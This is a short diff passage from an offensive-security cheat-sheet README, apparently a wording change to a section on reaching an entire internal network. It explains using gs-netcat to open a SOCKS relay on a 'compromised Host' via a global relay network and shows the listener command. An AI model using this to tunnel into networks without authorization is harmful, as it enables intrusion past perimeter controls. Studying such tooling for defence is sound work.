hackerschoice/thc-tips-tricks-hacks-cheat-sheet/README.md

 <a id="bdra-anchor"></a>
 **6.iii.
 Remote Access to an entire network**

 Install [gs-netcat](https://github.com/hackerschoice/gsocket).
-It creates a SOCKS relay on the Host's private lan which is accessible through the global socket relay network without the need of a Command & Control server (e.g. directly from your workstation):
+It creates a SOCKS relay on the Host's private lan which is accessible through the Global Relay network without the need to run your own server (e.g. directly from your workstation):

 ```
 $ gs-netcat -l -S       # compromised Host